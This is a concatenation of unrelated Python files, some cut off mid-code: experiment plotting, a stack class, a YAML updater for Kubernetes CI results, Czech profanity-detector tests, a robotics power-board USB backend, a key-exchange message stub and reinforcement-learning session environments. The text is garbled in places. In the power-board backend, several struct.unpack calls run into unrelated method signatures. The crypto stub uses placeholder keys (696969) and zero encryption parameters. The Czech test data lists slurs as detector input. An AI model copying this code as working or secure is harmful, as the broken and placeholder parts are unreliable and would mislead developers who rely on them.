axarr[1].set_xlabel("Number of faces detected in a window of " + str(window_length) + " seconds") plt.show() # Create overall plot for p in persons: plt.figure() plt.plot(results.loc[results["person_id"] == p]["colocated"], results.loc[results["person_id"] == p]["face_count"], 'x') plt.title(p) plt.draw() plt.figure(figsize=(8, 3)) plt.plot(results["colocated"], results["face_count"], 'x') plt.ylabel("Number of detected faces") plt.xlabel("Person co-located with other participant in window [%]") plt.tight_layout() plt.show() if __name__ == '__main__': experiment = "/Volumes/DataDrive/igroups_recordings/igroups_experiment_8" activity_label_replacements = [ ("walking on the floor", "Walk"), ("carry tv spacer", "Walk"), ("carry tools", "Walk"), ("TV lifting: taking out of the box", "Screen placement"), ("TV lifting: putting on the wall", "Screen placement"), ("TV lifting: taking off the wall", "Screen placement"), ("TV lifting: putting in the box", "Screen placement"), ("carry screen", "Carry"), ("screw: by screw driver", "Screwdriver"), ("screw: by electric drill", "Drill"), ("screw: by hand", "Adjust"), ("placing items", "Adjust"), ("unpack tools", "Adjust"), ] activity_labels_to_remove = [ "synchronisation", ] face_detection_vs_colocation(experiment) exit() face_detection_vs_location(experiment) face_detection_vs_activity(experiment, activity_label_replacements, activity_labels_to_remove)Data-Structures/graph/graph/stack.py from graph.node import Node class Stack: def __init__(self): ''' create a constructor ''' self.top = None def push(self, value): ''' push method to add element to stack ''' node = Node(value) node.next = self.top self.top = node def pop(self): ''' pop method to return and delete first element in stack ''' if(self.top is None): raise Exception('You cant pop from empty stack') temp=self.top.value self.top=self.top.next return temp def peek(self): ''' peek method to return and do not delete first element in stack ''' if(self.top is None): raise Exception('You cant peek from empty stack') return self.top.value def is_empty(self): ''' is_empty method to check if stack empty or not ''' return self.top == Nonedemos/assignment_10/8am/mytools.py #!/usr/bin/env python3 """ Simple utility library to demonstrate importing and using 
functions from a module. """ from random import choice, randint, randrange def create_random_tuple(): """ Return a tuple with length between 10 and 20 (inclusive), populated with random integers between 1 and 100 (inclusive). """ return tuple([randint(1, 100) for _ in range(randrange(10, 21))]) def choose_random(values): """ Return a random value from the tuple passed as an argument. """ return choice(values) def has_common_element(a, b): """ Return True if iterables a and b have at least one element in common. """ return not len(set(a) & set(b)) == 0 def filter_even(l): """ Return a new list consisting of the members of l that are odd. """ return [num for num in l if num % 2 != 0] if __name__ == "__main__": print("Exercising create_random_tuple()") t = create_random_tuple() print(f"{type(t)} {t}") print() print("Exercising choose_random()") print(choose_random(t)) print() print("Imagine has_common_element() and filter_even() being exercised here...") print() ii-ci/apisnoop #!/usr/bin/env python import yaml try: from urllib.request import urlopen, urlretrieve except Exception as e: from urllib import urlopen, urlretrieve import re from bs4 import BeautifulSoup import click gubernator = "https://gubernator.k8s.io/builds/kubernetes-jenkins/logs/" def get_html(url): html = urlopen(url).read() soup = BeautifulSoup(html, 'html.parser') return soup @click.command() @click.argument('sources') def main(sources): # https://github.com/yaml/pyyaml/wiki/PyYAML-yaml.load(input)-Deprecation syaml = yaml.load(open(sources).read(),Loader=yaml.FullLoader) for top, level in syaml.items(): for sublevel, entry in level.items(): for bucket, jobs in entry.items(): testgrid_history = get_html(gubernator + bucket) latest_success= int( testgrid_history.find( title=re.compile("SUCCESS") ).parent.text.split( '\n' )[0].encode ( 'ascii','ignore' ) ) syaml[top][sublevel][bucket]=[latest_success] with open(sources, "w") as f: yaml_content = yaml.dump(syaml, indent=4, default_flow_style=False) f.write(yaml_content) print(yaml_content) if __name__ == "__main__": main() import pickle from nose.tools import eq_ from .. 
import czech from ...datasources import revision_oriented from ...dependencies import solve from .util import compare_extraction BAD = [ "arnulfo", "blb", "blbá", "blbec", "blbej", "blbost", "blbosti", "buzerant", "buzeranti", "buzik", "buzna", "buzny", "curaci", "curak", "čumíš", "čuráci", "čůráci", "čurak", "čurák", "čůrák", "čuráka", "ddd", "dddd", "ddddd", "debil", "debile", "debilní", "debilové", "debilů", "dementi", "děvka", "ekrimi", "eskader", "exkrementu", "fekaliemi", "fekalni", "freeforfun", "fuck", "fuj", "gay", "gej", "gportal", "hnusná", "hovada", "hovadina", "hoven", "hovna", "hovno", "hovnu", "howno", "idiot", "kastrováni", "keci", "kokot", "kokota", "kokote", "kokoti", "kokotina", "kravina", "kreten", "kretén", "kreteni", "kreténi", "kunda", "kundo", "kundy", "kurva", "kurvy", "kuzdasová", "magor", "mrdá", "mrdal", "mrdání", "mrdat", "mrdka", "mrdky", "nasrat", "necum", "nečum", "neser", "nesmrděli", "penis", "penisu", "péra", "péro", "pica", "pice", "pici", "pico", "picovina", "picu", "piča", "píča", "piče", "píče", "piči", "píči", "pičo", "píčo", "pičovina", "píčovina", "píčoviny", "piču", "píču", "pičus", "píčus", "polib", "polibte", "posral", "posrávání", "prd", "prdel", "prdele", "prdeli", "prdy", "sex", "sexy", "slovackatiskovakancelar", "smrad", "smrděl", "smrdi", "smrdí", "smrdis", "smrdíš", "smrdite", "smrdíte", "sracka", "sraček", "sračka", "sračky", "sraní", "svině", "šuká", "šukal", "šukání", "šukat", "teplej", "vole", "všiví", "vycucali", "vykaly", "zasranej", "zasraný", "zkurvenýho", "zmrd", "zmrde", "zmrdi" ] INFORMAL = [ "ahoj", "ahojky", "balustrada", "bla", "blablabla", "borec", "bydlí", "cau", "čau", "čus", "děkuji", "dete", "děte", "editovat", "furt", "haha", "hahaha", "hahahaha", "hodne", "jeto", "jjj", "jste", "julieta", "juliin", "kapuletů", "kolínšti", "kterej", "kurzíva", "lol", "mam", "mám", "mate", "máte", "média", "miluju", "moje", "montekové", "monteků", "mucednici", "nadpisu", "neformátovaný", "neni", "neprůstřelné", "nepřestanete", "nevim", "nuda", "odkazu", "omg", "omluvného", "patláním", "pekna", "pěkně", "pepa", "plnýho", "podžezali", "porno", "prografika", "proste", "prostě", "protoze", "přeškrtnutý", "příklad", "příspěvky", "rád", "roméo", "romerovi", "romeus", "salvadorský", "salvadorští", "sem", "smazat", "sou", "ste", "strašně", "tady", "taky", "tipynavylety", "tučný", "tybalt", "tybalta", "uklizečky", "ukradnou", "vam", "vám", "vás", "velkej", "velky", "vložit", "vložte", "vytrznik", "zdar", "znecistuje", "znečistil" ] OTHER = [ """ Rúmí se narodil v Balchu (město v tehdejší Persii, v provincii Chorásánu, nyní v severním Afghánistánu) a zemřel v Konyi (v Anatolii, tehdy Rúmský sultanát, dnes Turecko), kam se roku 1228 přestěhoval na předchozí pozvání rúmského sultána Kajkubáda I. Svou poezii psal v perštině a jeho práce jsou široce čtené v Íránu a Afghánistánu, kde se perštinou mluví. 
""" ] def test_badwords(): compare_extraction(czech.badwords.revision.datasources.matches, BAD, OTHER) eq_(czech.badwords, pickle.loads(pickle.dumps(czech.badwords))) def test_informals(): compare_extraction(czech.informals.revision.datasources.matches, INFORMAL, OTHER) eq_(czech.informals, pickle.loads(pickle.dumps(czech.informals))) def test_dictionary(): cache = {revision_oriented.revision.text: 'kam se roku worngly.'} eq_(solve(czech.dictionary.revision.datasources.dict_words, cache=cache), ["kam", "se", "roku"]) eq_(solve(czech.dictionary.revision.datasources.non_dict_words, cache=cache), ["worngly"]) eq_(czech.dictionary, pickle.loads(pickle.dumps(czech.dictionary))) def test_stopwords(): cache = {revision_oriented.revision.text: 'rúmského sultána odkazy'} eq_(solve(czech.stopwords.revision.datasources.stopwords, cache=cache), ['odkazy']) eq_(solve(czech.stopwords.revision.datasources.non_stopwords, cache=cache), ['rúmského', 'sultána']) eq_(czech.stopwords, pickle.loads(pickle.dumps(czech.stopwords))) """Hardware Backend for the SR V4 power board.""" import struct from datetime import timedelta from time import sleep from typing import Callable, Dict, Mapping, Set, cast import usb from j5.backends.hardware.env import NotSupportedByHardwareError from j5.backends.hardware.j5.raw_usb import ( RawUSBHardwareBackend, ReadCommand, WriteCommand, handle_usb_error, ) from j5.boards import Board from j5.boards.sr.v4.power_board import PowerBoard, PowerOutputPosition from j5.components import ( BatterySensorInterface, ButtonInterface, LEDInterface, PiezoInterface, PowerOutputInterface, ) # The names and codes of these commands match the definitions in usb.h in the firmware # source. CMD_READ_OUTPUT: Mapping[int, ReadCommand] = { output.value: ReadCommand(output.value, 4) for output in PowerOutputPosition } CMD_READ_5VRAIL = ReadCommand(6, 4) CMD_READ_BATTERY = ReadCommand(7, 8) CMD_READ_BUTTON = ReadCommand(8, 4) CMD_READ_FWVER = ReadCommand(9, 4) CMD_WRITE_OUTPUT: Mapping[int, WriteCommand] = { output.value: WriteCommand(output.value) for output in PowerOutputPosition } CMD_WRITE_RUNLED = WriteCommand(6) CMD_WRITE_ERRORLED = WriteCommand(7) CMD_WRITE_PIEZO = WriteCommand(8) class SRV4PowerBoardHardwareBackend( PowerOutputInterface, PiezoInterface, ButtonInterface, BatterySensorInterface, LEDInterface, RawUSBHardwareBackend, ): """The hardware implementation of the SR V4 power board.""" board = PowerBoard @classmethod @handle_usb_error def discover(cls, find: Callable = usb.core.find) -> Set[Board]: """Discover boards that this backend can control.""" boards: Set[Board] = set() device_list = find(idVendor=0x1bda, idProduct=0x0010, find_all=True) for device in device_list: backend = cls(device) board = PowerBoard(backend.serial, backend) boards.add(cast(Board, board)) return boards @handle_usb_error def __init__(self, usb_device: usb.core.Device) -> None: self._usb_device = usb_device self._output_states: Dict[int, bool] = { output.value: False for output in PowerOutputPosition } self._led_states: Dict[int, bool] = { i: False for i in range(2) } self.check_firmware_version_supported() def check_firmware_version_supported(self) -> None: """Raises an exception if the firmware version is not supported.""" v = self.firmware_version if v != "3": raise NotImplementedError(f"this power board is running firmware " f"version {v}, but only version 3 is supported") @property def firmware_version(self) -> str: """The firmware version reported by the board.""" version, = struct.unpack(" bool: """Get whether 
a power output is enabled.""" try: return self._output_states[identifier] except KeyError: raise ValueError(f"Invalid power output identifier {identifier!r}; " f"valid identifiers are {CMD_WRITE_OUTPUT.keys()}") from None def set_power_output_enabled( self, identifier: int, enabled: bool, ) -> None: """Set whether a power output is enabled.""" try: cmd = CMD_WRITE_OUTPUT[identifier] except KeyError: raise ValueError(f"Invalid power output identifier {identifier!r}; " f"valid identifiers are {CMD_WRITE_OUTPUT.keys()}") from None self._write(cmd, int(enabled)) self._output_states[identifier] = enabled def get_power_output_current(self, identifier: int) -> float: """Get the current being drawn on a power output, in amperes.""" try: cmd = CMD_READ_OUTPUT[identifier] except KeyError: raise ValueError(f"invalid power output identifier {identifier!r}; " f"valid identifiers are {CMD_READ_OUTPUT.keys()}") from None current, = struct.unpack(" None: """Queue a pitch to be played.""" if identifier != 0: raise ValueError(f"invalid piezo identifier {identifier!r}; " f"the only valid identifier is 0") duration_ms = round(duration / timedelta(milliseconds=1)) if duration_ms > 65535: raise NotSupportedByHardwareError("Maximum piezo duration is 65535ms.") frequency_int = int(round(frequency)) if frequency_int > 65535: raise NotSupportedByHardwareError("Maximum piezo frequency is 65535Hz.") data = struct.pack(" bool: """Get the state of a button.""" if identifier != 0: raise ValueError(f"invalid button identifier {identifier!r}; " f"the only valid identifier is 0") state, = struct.unpack(" None: """Halt the program until this button is pushed.""" while not self.get_button_state(identifier): sleep(0.05) def get_battery_sensor_voltage(self, identifier: int) -> float: """Get the voltage of a battery sensor.""" if identifier != 0: raise ValueError(f"invalid battery sensor identifier {identifier!r}; " f"the only valid identifier is 0") current, voltage = struct.unpack(" float: """Get the current of a battery sensor.""" if identifier != 0: raise ValueError(f"invalid battery sensor identifier {identifier!r}; " f"the only valid identifier is 0") current, voltage = struct.unpack(" bool: """Get the state of an LED.""" return self._led_states[identifier] def set_led_state(self, identifier: int, state: bool) -> None: """Set the state of an LED.""" cmds = {0: CMD_WRITE_RUNLED, 1: CMD_WRITE_ERRORLED} try: cmd = cmds[identifier] except KeyError: raise ValueError(f"invalid LED identifier {identifier!r}; valid identifiers " f"are 0 (run LED) and 1 (error LED)") from None self._write(cmd, int(state)) self._led_states[identifier] = state 1-10 """ Object to handle json message Request and Response """ import json import datetime import encryptlib.SimonCTR as ctr WHO_SENT = "ShelterInPlaceHackers" class JsonMessage(object): def __init__(self): """ Default constructor for JsonMessage class object """ self.dhke_data = { "payload": { "agreement_data": { "hash_sess_key": "", "diffie_pub_k": "" }, "signature": "" }, "sess_key": { "key": "", # 256 bits "nonce": "" # ToD } } """ Alice -> Bob dhke = { "payload": "", "sess_key"" "" } """ def set_json_payload(self): """ Function used to handle creating the json message response or request """ # Currently not passing parameters, but might need to change self.set_agreement_data() self.set_signature() self.set_sess_key() def encrypt_payload(self): """ Function to encrypt the message payload """ payload_str = json.dumps(self.dhke_data["payload"]) payload_binary_str = 
ctr.string_to_binary(payload_str) binary_str_encrypted = ctr.countermode_encrypt(payload_binary_str, 0, 0) self.dhke_data["payload"] = binary_str_encrypted def decrypt_payload(self): """ Function to decrypt payload message """ payload_str = json.dumps(self.dhke_data["payload"]) binary_str_decrypted = ctr.countermode_decrypt(self.dhke_data["payload"], 0, 0) self.dhke_data["payload"] = ctr.binary_to_string(binary_str_decrypted) def set_agreement_data(self): """ Function used to handle setting agreement data parameters """ self.dhke_data["payload"]["agreement_data"]["diffie_pub_k"] = 696969 self.dhke_data["payload"]["agreement_data"]["hash_sess_key"] = 696969 def set_signature(self): """ Function used to handle setting signature """ self.dhke_data["payload"]["signature"] = 696969 def set_sess_key(self): """ Function used to set sess key parameters """ self.dhke_data["sess_key"]["key"] = 696969 self.dhke_data["sess_key"]["nonce"] = 696969 def __str__(self): """ Function to return json object as string """ return json.dumps(self.dhke_data) import os from sqlalchemy import create_engine from sqlalchemy import Table, Boolean, Column, Integer, String, Text, MetaData, ForeignKey from sqlalchemy.ext.declarative import declarative_base from sqlalchemy.orm import sessionmaker, scoped_session PROJECT_DIR = os.path.abspath(os.path.dirname(__file__)) sqliteConnectionString = 'sqlite:///%s' % os.path.join(PROJECT_DIR, '..', '..', 'derp.db') engine = create_engine(sqliteConnectionString, echo=True) Base = declarative_base(bind=engine) Session = scoped_session(sessionmaker(engine)) class Derp(Base): __tablename__ = 'derp' id = Column(Integer, primary_key=True) key = Column(String(80), index=True, unique=True) value = Column(String(256), unique=False) def __repr__(self): return '' % (self.key, self.value) Base.metadata.create_all() import copy import os import time from collections.abc import Iterable from . 
import ctx from .dbmodels import EnvSpecModel from .remote_env import (RemoteMultiAgentEnvClient, RemoteSingleAgentEnvClient) from .session import DataSession, RLSession from .util_funcs import merged_dict from .utils.env_helpers import get_wrapped_env_instance from .utils.pyson import pyson from .common import MAEnv from .env_base import DataEnvironment from .meta import * from .session_config import DataSessionConfig, RLSessionConfig from .task import Task class IterableMonitor: def __init__(self, name, iterable: Iterable): self.name = name self.iterable: Iterable = iterable self.epoch_id = None self.total_batches = 0 self.batch_id = 0 self.last_inputs = None self.last_targets = None def __iter__(self): if self.epoch_id is None: self.epoch_id = 0 self.epoch_id += 1 self.batch_id = 0 self.last_inputs = None self.last_targets = None self.iter = self.iterable.__iter__() self.next = self.__next__ return self def __next__(self): self.last_inputs, self.last_targets = self.iter.__next__() self.total_batches += 1 self.batch_id += 1 return self.last_inputs, self.last_targets class DataSessionEnv: def __init__(self, task_id=None, agent_id=None, agent_run_config=None, env_spec_id=None, env_kwargs={}, run_meta={}, config: DataSessionConfig = None): self.metadata = {} # TODO: just place holder, should put something here (required in stable baselines "dummy_vec_env.py") self.task_id = task_id self.agent_id = agent_id self.env_spec_id = env_spec_id self.agent_id = agent_id self.agent_run_config = agent_run_config self.run_meta = run_meta env_spec_model = self.get_spec_env_dbmodel() default_env_kwargs = env_spec_model.config.get('env_kwargs', {}) self.env_kwargs = pyson(merged_dict(default_env_kwargs, env_kwargs)) env_entry_point = env_spec_model.entry_point self.config = config or DataSessionConfig() self.flush_interval_secs = 1.0 self.last_summary_flush = 0 self._logger = None wrappers = self.config.wrappers + env_spec_model.config['default_wrappers'] self.env: DataEnvironment = get_wrapped_env_instance( entry_point=env_entry_point, kwargs=self.env_kwargs, wrappers=wrappers) self.session = DataSession( task_id=task_id, agent_id=agent_id, agent_run_config=agent_run_config, env_spec_id=env_spec_id) self.data_iterable = IterableMonitor( 'data', self.env.get_data_loader()) self.eval_iterable = IterableMonitor( 'eval', self.env.get_eval_loader()) self.eval_running_results = [] def get_data_loader(self): return self.data_iterable def get_eval_loader(self): self.eval_running_results = [] return self.eval_iterable def log_metrics(self, **metrics): epoch_id = self.data_iterable.epoch_id batch_id = self.data_iterable.batch_id total_batches = self.data_iterable.total_batches metrics['timestamp'] = time.time() metrics['epoch_id'] = epoch_id metrics['batch_id'] = batch_id metrics['total_batches'] = total_batches return self.session.log_data_metrics(metrics) #TODO: mucho code overlap with above def log_evaluation_metrics(self, **metrics): epoch_id = self.data_iterable.epoch_id batch_id = self.data_iterable.batch_id total_batches = self.data_iterable.total_batches metrics['timestamp'] = time.time() metrics['epoch_id'] = epoch_id metrics['batch_id'] = batch_id metrics['total_batches'] = total_batches self.session.log_evaluation_metrics(metrics) return metrics # API for prediction only output def submit_predictions(self, name, outputs, predictions, **metrics): inputs = self.data_iterable.last_inputs metrics = self.log_metrics(**metrics) self.session.log_predictions(name, inputs, outputs, predictions, metrics) 
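# --- Hedged usage sketch for the IterableMonitor wrapper defined above (assumes that class is in
# scope): it passes (inputs, targets) batches through unchanged while counting epochs and batches.
# The toy list below stands in for a real data loader.
toy_batches = [([1, 2], [0, 1]), ([3, 4], [1, 0])]   # hypothetical (inputs, targets) pairs
monitor = IterableMonitor("demo", toy_batches)
for _epoch in range(2):
    for inputs, targets in monitor:
        pass                                          # training step would go here
print(monitor.epoch_id, monitor.total_batches)        # expected: 2 4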
self.env.submit_predictions(outputs, predictions) def get_logger(self): if self._logger is None: self._logger = ctx.get_entity_logger(TASK_ENTITY, self.task_id) return self._logger def get_sess_config(self) -> DataSessionConfig: return self.config def get_spec_env_dbmodel(self) -> EnvSpecModel: return ctx.get_dbsession().query(EnvSpecModel).get(self.env_spec_id) def get_task(self) -> Task: return Task.load(self.task_id) def close(self): self.session.close() self.env.close() def evaluate(self, expected, predictions): return self.env.evaluate(expected, predictions) def is_complete(self): # TODO: support termination criteria return False class BatchedEnv: def __init__(self, env_entry_point, env_kwargs, batch_size=1, wrappers=[]): self.env_entry_point = env_entry_point self.env_kwargs = env_kwargs self.batch_size = batch_size self.num_players = batch_size self.wrappers = wrappers self.max_num_players = batch_size self.players = [f"player_{i}" for i in range(self.num_players)] self.possible_players = self.players self.envs = {} self.observation_spaces = {} self.action_spaces = {} for k in self.players: ctx.get_logger().info(f"Loading env: {self.env_entry_point}, with {self.env_kwargs}") env = get_wrapped_env_instance(self.env_entry_point, self.env_kwargs, wrappers) self.observation_spaces[k] = env.observation_space self.action_spaces[k] = env.action_space self.envs[k] = env self.awaiting_reset = [k for k in self.players] self.enable_auto_reset = False def reset(self): # Forced reset obs = {} for k, env in self.envs.items(): obs[k] = env.reset() self.awaiting_reset = [] return obs def auto_reset(self): obs = {} for k in self.awaiting_reset: obs[k] = self.envs[k].reset() self.awaiting_reset = [] return obs def step(self, action_dict): rews, dones, infos = {}, {}, {} # Auto reset if enabled if self.enable_auto_reset and len(self.awaiting_reset) > 0: obs = self.auto_reset() for k in obs.keys(): rews[k] = None dones[k] = False infos[k] = {'start': True} else: obs = {} # Take steps for all actions provided for k, action in action_dict.items(): ob, rew, done, info = self.envs[k].step(action) if done: # Used for auto reset self.awaiting_reset.append(k) obs[k] = ob rews[k] = rew dones[k] = done infos[k] = info # Set __all__ done key if len(dones) == self.num_players: dones["__all__"] = all(dones.values()) return obs, rews, dones, infos def render(self, player_id, *args, **kwargs): return self.envs[player_id].render(*args, **kwargs) def close(self): for env in self.envs.values(): env.close() class RLSessionEnvBase: def __init__(self, task_id=None, agent_id=None, env_spec_id=None, env_kwargs={}, config: RLSessionConfig = None): self.metadata = {} # TODO: just place holder, should put something here (required in stable baselines "dummy_vec_env.py") self.task_id = task_id self.agent_id = agent_id self.env_spec_id = env_spec_id env_spec_model = self.get_spec_env_dbmodel() self.env_entry_point = env_spec_model.entry_point self.env_type = env_spec_model.env_type self.env_config = copy.deepcopy(env_spec_model.config) self.env_kwargs = self.env_config['env_kwargs'] self.env_kwargs.update(env_kwargs) self.config = config or RLSessionConfig() self.flush_interval_secs = 1.0 self.last_summary_flush = 0 self._logger = None def get_logger(self): if self._logger is None: self._logger = ctx.get_entity_logger(TASK_ENTITY, self.task_id) return self._logger def get_sess_config(self) -> RLSessionConfig: return self.config def get_spec_env_dbmodel(self) -> EnvSpecModel: return 
ctx.get_dbsession().query(EnvSpecModel).get(self.env_spec_id) def get_task(self) -> Task: return Task.load(self.task_id) class RLMultiSessionEnv(RLSessionEnvBase): """ TODO: This class serves too many purposes and the logic gets complicated. Consider switching to Factory for building objects that share an interface TODO: Consider adding Non-Logging Remote Session for consistancy TODO: FIX limitation by introducing batched multiplayer interface Options: NonBatched/Batched, Single/Multiplayer """ def __init__( self, agent_id=None, agent_run_config={}, use_remote_client=False, auto_reset=False, batch_size=1, run_meta={}, child_session_configs={}, timeout_abort_check_callback=lambda: False, *args, **kwargs): super().__init__(*args, **kwargs) self.agent_id = agent_id self.agent_run_config = agent_run_config self.use_remote_client = use_remote_client self.run_meta = run_meta self.batch_size = batch_size self.child_session_configs = child_session_configs os.environ['SDL_VIDEODRIVER'] = 'dummy' os.environ['SDL_AUDIODRIVER'] = "" self.is_multiplayer = self.env_type == RL_MULTIPLAYER_ENV if self.is_multiplayer and self.batch_size > 1: raise Exception("batchsize must be '1' for multiagent environments") self.player_list = None self.task = self.get_task() # Only local sessions have a primary session self.session = None self.parent_session_id = None # Configure Environemnt (make sure to assign self.player_list) if self.use_remote_client: # Remote Env self.get_logger().info("Is RemoteMultiAgentClient with {}".format(self.env_kwargs)) #TODO: Don't put this stuff in env_kwargs self.env = RemoteMultiAgentEnvClient( agent_id=agent_id, timeout_abort_check_callback=timeout_abort_check_callback, task_id = self.env_kwargs['task_id'], session_id = self.env_kwargs['session_id'], observation_spaces = pyson(self.env_kwargs['observation_spaces']), action_spaces = pyson(self.env_kwargs['action_spaces'])) # **self.env_kwargs) self.parent_session_id = self.env_kwargs['session_id'] self.player_list = self.env.players elif self.is_multiplayer: # Local Env and Multi Agent self.get_logger().info("Is Local Multi Agent") wrappers = self.config.wrappers + self.env_config['default_wrappers'] self.env: MAEnv = get_wrapped_env_instance( entry_point=self.env_entry_point, kwargs=self.env_kwargs, wrappers=wrappers) self.env.reset() self.player_list = self.env.players self.session = RLSession( config=self.config, task_id=self.task_id, agent_id=self.agent_id, agent_run_config=self.agent_run_config, env_spec_id=self.env_spec_id, session_type=RL_MULTIPLAYER_SINGLEAGENT_SESS, run_meta=run_meta, render_fn=lambda mode: self.env.render(mode=mode), persists_at_creation=True) self.parent_session_id = self.session.get_id() self.task.set_primary_session_by_id(self.parent_session_id) else: # Local Env and Batched self.get_logger().info(f"Is Batched Single Agent Env batch_size = {self.batch_size}") wrappers = self.config.wrappers + self.env_config['default_wrappers'] self.get_logger().info(f"Wrappers {wrappers}") self.env = BatchedEnv( env_entry_point=self.env_entry_point, env_kwargs=self.env_kwargs, batch_size=self.batch_size, wrappers=wrappers) self.player_list = self.env.players if self.batch_size > 1: self.session = RLSession( config=self.config, task_id=self.task_id, agent_id=self.agent_id, agent_run_config=self.agent_run_config, env_spec_id=self.env_spec_id, session_type=RL_SINGLEPLAYER_BATCHED_SESS, run_meta=run_meta, render_fn=None, persists_at_creation=True) self.parent_session_id = self.session.get_id() 
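# --- Hedged sketch of the dict-keyed batching convention used by BatchedEnv above: observations,
# rewards and dones are dicts keyed by player id, and "__all__" is set once every sub-env is done.
# ToyEnv is a stand-in, not part of any real environment registry.
import random


class ToyEnv:
    def reset(self):
        self.t = 0
        return 0.0

    def step(self, action):
        self.t += 1
        return float(self.t), random.random(), self.t >= 3, {}


envs = {f"player_{i}": ToyEnv() for i in range(2)}
obs = {k: env.reset() for k, env in envs.items()}
for _ in range(3):
    actions = {k: 0 for k in envs}                    # dummy actions
    rews, dones = {}, {}
    for k, action in actions.items():
        obs[k], rews[k], dones[k], _ = envs[k].step(action)
    dones["__all__"] = all(dones.values())            # mirrors BatchedEnv.step()
print(dones)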
self.task.set_primary_session_by_id(self.parent_session_id) self.players = self.env.players self.num_players = self.env.num_players self.get_logger().info("Players {}".format(self.player_list)) self.observation_spaces = self.env.observation_spaces self.action_spaces = self.env.action_spaces self.get_logger().info(f"Obs Spaces {self.observation_spaces}") self.reset_all = True self.auto_reset = auto_reset self.child_sessions: Dict[str, RLSession] = {} for player_id in self.player_list: self.new_child_session(player_id) self.done_players = set() self.valid_action_dict = {} def get_child_summary_list(self): return {s.get_id(): s.get_summary() for s in self.child_sessions.values()} def get_child_session_player_ids(self): return {s.get_id(): player_id for player_id, s in self.child_sessions.items()} def new_child_session(self, player_id): env_run_meta = { 'players': [player_id], 'observation_spaces': {player_id: self.env.observation_spaces[player_id]}, 'action_spaces': {player_id: self.env.action_spaces[player_id]} } render_fn = lambda *args, **kwargs: self.env.render(player_id=player_id, *args, **kwargs) if player_id in self.child_session_configs: sess_config = RLSessionConfig(**self.child_session_configs[player_id]) else: sess_config = copy.copy(self.get_sess_config()) # Child sessions do not terminate on their own. Make sure session_configuration reflects this. if self.session: sess_config.max_episodes = 0 sess_config.max_steps = 0 sess_config.max_steps_in_episode = 0 session = RLSession( config=sess_config, task_id=self.task_id, agent_id=self.agent_id, parent_session_id=self.parent_session_id, agent_run_config=self.agent_run_config, env_spec_id=self.env_spec_id, env_run_meta=env_run_meta, render_fn=render_fn, session_type=RL_SINGLEPLAYER_SESS, persists_at_creation=True) if self.parent_session_id is None: self.task.set_primary_session_by_id(session.get_id()) self.child_sessions[player_id] = session def reset(self): for k, session in self.child_sessions.items(): session.before_reset() if self.session: self.session.before_reset() obs = self.env.reset() if self.session: self.session.after_reset(obs) for k, ob in obs.items(): self.child_sessions[k].after_reset(ob) self.done_players = set() self.reset_all = False return obs def step(self, action_dict) -> Tuple[Dict[str,Any],Dict[str,Any],Dict[str,Any],Dict[str,Any]]: if self.auto_reset and self.reset_all: obs = self.reset() rews, dones, infos = {}, {}, {} for k, ob in obs.items(): rews[k] = None dones[k] = False infos[k] = {'start': True} else: self.valid_action_dict = {} for player_id, action in action_dict.items(): if player_id not in self.done_players: self.valid_action_dict[player_id] = action self.child_sessions[player_id].before_step(action) else: self.get_logger().debug("Warning: agent id {} is complete. 
Action is invalid and will not be used".format(player_id)) if self.session: self.session.before_step(self.valid_action_dict) obs, rews, dones, infos = self.env.step(self.valid_action_dict) if self.session: self.session.after_step(obs, rews, dones, infos, self.valid_action_dict) for player_id in obs.keys(): action = self.valid_action_dict.get(player_id) self.child_sessions[player_id].after_step( obs[player_id], rews[player_id], dones[player_id], infos[player_id], action) for player_id, done in dones.items(): if done: self.done_players.add(player_id) if len(self.done_players) == len(self.child_sessions): dones['__all__'] = True # Check session limits, if reached - mark all as done if self.is_complete(): dones = {player_id: True for player_id, v in dones.items()} dones["__all__"] = True # If done, reset on next step dones["__all__"] = dones.get("__all__", False) if dones["__all__"]: self.reset_all = True # save session stats cur_time = time.time() if self.reset_all or (((cur_time - self.last_summary_flush) > self.flush_interval_secs)): for session in self.child_sessions.values(): session.save_summary() if self.session: self.session.save_summary() self.last_summary_flush = cur_time return obs, rews, dones, infos def is_complete(self): if self.session: return self.session.is_complete() else: # TODO, remote session? False def render(self, *args, **kwargs): return self.env(*args, **kwargs) def close(self): self.env.close() close_state = STATE_TERMINATED if self.session: close_state = self.session.close() for session in self.child_sessions.values(): session.close(state=close_state) class RLSingleSessionEnv(RLSessionEnvBase): """ TODO: NOT CURRENTLY WORKING """ def __init__( self, agent_id=None, agent_run_config={}, use_remote_client=False, run_meta={}, timeout_abort_check_callback=lambda: False, *args, **kwargs): super().__init__(*args, **kwargs) self.agent_id = agent_id self.agent_run_config = agent_run_config self.use_remote_client = use_remote_client self.run_meta = run_meta env_spec_model = self.get_spec_env_dbmodel() env_entry_point = env_spec_model.entry_point self.player_id = None parent_session_id = None if self.use_remote_client: # Remote Env self.get_logger().info("Is RemoteMultiAgentClient with {}".format(self.env_kwargs)) self.env = RemoteSingleAgentEnvClient( agent_id=agent_id, timeout_abort_check_callback=timeout_abort_check_callback, **self.env_kwargs) parent_session_id = self.env_kwargs['session_id'] else: # Local Env assert(env_spec_model.env_type == RL_SINGLEPLAYER_ENV), "Cannot use RLSingleSessionEnv with Local Mode MultiPlayer Environments" self.get_logger().info("Is Local Single Agent Env") wrappers = self.config.wrappers + env_spec_model.config['default_wrappers'] self.env = get_wrapped_env_instance( entry_point=env_entry_point, kwargs=self.env_kwargs, wrappers=wrappers) self.env.reset() self.session = RLSession( config=self.config, task_id=self.task_id, agent_id=self.agent_id, agent_run_config=self.agent_run_config, parent_session_id=parent_session_id, env_spec_id=self.env_spec_id, session_type=RL_SINGLEPLAYER_SESS, run_meta=run_meta, render_fn=lambda mode: self.env.render(mode=mode)) primary_session_id = parent_session_id or self.session.get_id() self.task = self.get_task() self.task.set_primary_session_by_id(primary_session_id) self.observation_space = self.env.observation_space self.action_space = self.env.action_space def reset(self): self.session.before_reset() ob = self.env.reset() self.session.after_reset(ob) return ob def step(self, action): 
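# --- Hedged sketch (hypothetical, not part of RLSingleSessionEnv) ------------
# Both session envs follow the same instrumentation pattern around env.step():
# the session records the action before the env runs and the full transition
# afterwards. A minimal, generic version of that hook pattern:
class RecordingSession:
    """Stand-in for RLSession that just logs what it is told."""

    def __init__(self):
        self.log = []

    def before_step(self, action):
        self.log.append(("action", action))

    def after_step(self, ob, rew, done, info, action):
        self.log.append(("transition", ob, rew, done))


def instrumented_step(env, session, action):
    # wrap a single env.step() call with the before/after hooks
    session.before_step(action)
    ob, rew, done, info = env.step(action)
    session.after_step(ob, rew, done, info, action)
    return ob, rew, done, info
# -----------------------------------------------------------------------------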
